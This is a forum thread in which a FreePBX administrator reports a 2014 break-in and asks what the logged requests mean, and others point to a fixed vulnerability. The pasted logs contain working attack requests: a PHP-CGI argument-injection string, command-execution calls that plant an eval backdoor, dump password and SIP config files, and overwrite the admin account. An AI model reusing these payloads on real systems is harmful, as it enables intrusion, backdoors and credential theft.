FreePBX was easily hacked

Hi,

I have recently opened freepbx recent install to outside world and it was hacked nearly immediately. Does any one aware of its vulnerability?What was definitely hacked:

  1. admin FreeBPX panel password has been changed;
  2. the access to all configs including sip accounts has been gained;
    3)mysql pasword of freepbx user was also gained
    4)ability to execute shell_commands
  3. several strange queries in Apach logs have been found:
    a)

    “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

    which is decoded in

    -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

    What does this do?
    b)

    46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=sed%20-i%20’s/.<?php./<?php\nif\($_GET[“function”]==“system”\)%20exit\(\);\nif\(md5\($_REQUEST[“p”]\)==“c82e1edd948c8b34457e3e5fa17d1732”\)%[email protected]\($_REQUEST[“mgk”]\);/’%20config.php HTTP/1.1” 200 458 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"

    c)

    79.143.80.226 - - [12/Mar/2014:00:44:06 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=shell_exec&args=ls HTTP/1.1” 200 622 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"

    d)

    46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=mysql%20-uasterisk%20-pyIoJkMNop%20asterisk%20–execute%20"truncate%20ampusers”;%20mysql%20-uasterisk%20-pyIoJkMNop%20asterisk%20–execute%20"INSERT%20INTO%20ampusers%20(username,%20password_sha1,%20sections)%20VALUES%20(%27sona%27,%20%2719ad8cfe45a840a69d4dfcbb02ef9db41bb2ceb0%27,%20%27*%27)” HTTP/1.1” 200 458 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
    46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20-e%20”-Amportal.conf%20Passwords:\n”;%20grep%20PASS%20/etc/amportal.conf;%20echo%20-e%20"\n-sip_additional.conf:\n";%20cat%20/etc/asterisk/sip_additional.conf|grep%20-v%20’;’ HTTP/1.1" 200 1075 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5”

So what am I worry about:

  1. have they left some code which can repeat the hack again from inside?
    2)is there a chance they have gotten root system password?
    3)Is this a known problem?
    4)Is it going to be fixed?
    5)How safe is to open FreePbx outside the local network?

FreePBX 2.11.0
Thanks.

Thanks, looks this fix was not included into release of FreePBX 2.11.0, my fault that I didn’t upgrade the modules. Now, I have even locked FreePBX from outside except certain IPs.
Can you please know if hacker could receive root password for the system using this vulnerability?Do you happen to know the purpose of this exploit?Just steal admin privileges on mysql user,freepbx admin and be able to call for free?

It already was fixed last month. http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice

They can do anything the Asterisk user can do. It’s a shell exploit. They could still have access to your system.

It is indeed part of the 2.11 release cycle.